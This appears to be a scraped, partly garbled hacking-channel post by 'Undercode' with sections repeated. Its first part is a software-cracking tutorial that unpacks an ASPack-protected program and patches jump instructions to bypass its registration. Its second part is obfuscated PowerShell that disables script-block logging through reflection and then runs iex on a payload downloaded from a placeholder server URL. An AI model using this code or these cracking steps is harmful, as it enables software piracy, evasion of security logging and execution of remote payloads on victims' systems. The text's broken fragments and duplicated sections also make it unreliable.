3) Detect if there is shelling .
4) pw32dasmgold disassembly
5) Find the error message or the correct message may be correct mouse button
6) pw32dasmgold main window corresponding assembler analysis, to identify the key and key jump Call
7) the green light of the stop key in the jump, jump to find the key offset address at the bottom of the main window pw32dasmgold (actually modify the address)
8) Using ultraedit to find the offset address (actually modify the address) modify the machine code and save
π¦ The concept of the shell: copyright information needs to be protected, do not want others to change it, exe executable file compression, the most common shell software ASPACK, UPX, PEcompact
> Unpacking: Get a software to detect its shell, and then we need to unpack its shell to restore its original appearance. If it is not packed, it will not be necessary to unpack it. Unpacking software unaspack, caspr, upx, unpecompact, procdump
> Actually modify address (offset address) and the row address (virtual address) pw32dasmgold out disassembly code consists of three columns
of the first column of the row address (virtual address)
> in the second column machine code (modified in the final modified ultraedit)
the third column Assembly instruction
1) First column Second column Third column
: 0041BE38 2B45F0 sub eax, dword ptr [ebp-10]
: 0041BE3B 6A42 push 00000042
: 0041BE3D 50 push eax
: 0041BE3E FF75F4 push [ebp-0C]
: 0041BE41 FF75F0 push [ebp-10]
: 0041BE44 FF35A8AB4400 push dword ptr [0044ABA8]
2) Different modification methods
for two different situations :
a) Modify to jmp
je (jne, jz, jnz) => jmp corresponding machine code EB (the first jump found in the error message upward) jmp's role is to jump absolutely and unconditionally To skip the error message below
b) Modify to nop
je (jne, jz, jnz) => nop corresponding machine code 90 (the first jump found with the correct information upward) The role of nop is to erase this jump, make this jump invalid, and lose Function, so that the program smoothly comes to the correct information immediately following it.
π¦ Alright, let's start our cracking journey. . . . . . . . . .
1) Investigate the shell: First open the language.exe of the detect shell, and select Open ---- find the network fill-in terminator to be cracked: FormGhost.exe, click OK, as shown in Figure 1. language.exe shows that the software shell is: Aspack
2) Unpacking: Double-click the unpacked AspackDie.exe, a dialog box appears, select the network form filling terminator: FormGhost.exe, and open
3) Terminate the form in the network: FormGhost.exe generates an unpacked.exe file in the same directory. This is the unpacked FormGhost.exe.
4) start disassembly: open the decompile W32Dasm Gold-official version is chineese version, select disassembly-open the unpacked.exe after unpacking, and start to load
5) start to modify the software: open the hexadecimal editor UltraEdit.
Twitter
UNDERCODE NEWS (@UndercodeNews) | Twitter
The latest Tweets from UNDERCODE NEWS (@UndercodeNews). We provides you daily hacking News & Security Warning & Technologies news & Bugs reports & Analysis... @UndercodeNews @UndercodeUpdate @iUndercode @DailyCve. Aus/Leb
rar, (a bit slow)
>Open unpacked.exe after unpacking, directly press ctrl + g, a dialog box appears, enter 0xacb4b (that is, the offset address, not the preceding 000)
6)close all software, run the unpacked222.exe saved, click help --- registration, registration name, registration code to add casually, click OK, and prompt registration completion. Figure 21. Go back to the software interface and look at the help. The registration item has been grayed out
π¦ The cracking is all completed
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
>Open unpacked.exe after unpacking, directly press ctrl + g, a dialog box appears, enter 0xacb4b (that is, the offset address, not the preceding 000)
6)close all software, run the unpacked222.exe saved, click help --- registration, registration name, registration code to add casually, click OK, and prompt registration completion. Figure 21. Go back to the software interface and look at the help. The registration item has been grayed out
π¦ The cracking is all completed
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PowerShell ScriptBlock Log Bypass by underCode :
twitter.com/undercodeNews
π¦ ππΌππ πππΈβπ :
1) As with any logging service, ScriptBlock logging is controlled using Group Policy settings. PowerShell queries it every time it detects a new ScriptBlock to determine if it needs to be registered. But the fact is that PowerShell executes the request once, caches it in memory and returns it every time it is accessed.
2) Thus, these parameters can be easily changed using the following code.
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] =
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
3) These actions can be performed without administrator privileges and without touching the registry, which allows us to do this discreetly. But there is one limitation.
4) New policies are applied after checking the parameters that will be viewed when the first ScriptBlock is completed, which will lead to the registration of the event. Therefore, this trigger ScriptBlock should be as obfuscated as possible and should not carry any payload. That is, it is performed specifically to complete logging.
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
$val = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
$val.Add('EnableScriptB'+'lockLogging', 0)
$val.Add('EnableScriptB'+'lockInvocationLogging', 0)
$GroupPolicyCache['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging'] = $val
}
iex (New-Object Net.WebClient).downloadstring("https://server/payload.ps1")
5) The above script executes a trigger for the log, checks the logging parameters and launches the payload bypassing logging.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PowerShell ScriptBlock Log Bypass by underCode :
twitter.com/undercodeNews
π¦ ππΌππ πππΈβπ :
1) As with any logging service, ScriptBlock logging is controlled using Group Policy settings. PowerShell queries it every time it detects a new ScriptBlock to determine if it needs to be registered. But the fact is that PowerShell executes the request once, caches it in memory and returns it every time it is accessed.
2) Thus, these parameters can be easily changed using the following code.
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] =
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
3) These actions can be performed without administrator privileges and without touching the registry, which allows us to do this discreetly. But there is one limitation.
4) New policies are applied after checking the parameters that will be viewed when the first ScriptBlock is completed, which will lead to the registration of the event. Therefore, this trigger ScriptBlock should be as obfuscated as possible and should not carry any payload. That is, it is performed specifically to complete logging.
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
$val = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
$val.Add('EnableScriptB'+'lockLogging', 0)
$val.Add('EnableScriptB'+'lockInvocationLogging', 0)
$GroupPolicyCache['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging'] = $val
}
iex (New-Object Net.WebClient).downloadstring("https://server/payload.ps1")
5) The above script executes a trigger for the log, checks the logging parameters and launches the payload bypassing logging.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Twitter
UNDERCODE NEWS (@UndercodeNews) | Twitter
The latest Tweets from UNDERCODE NEWS (@UndercodeNews). We provides you daily hacking News & Security Warning & Technologies news & Bugs reports & Analysis... @UndercodeNews @UndercodeUpdate @iUndercode @DailyCve. Aus/Leb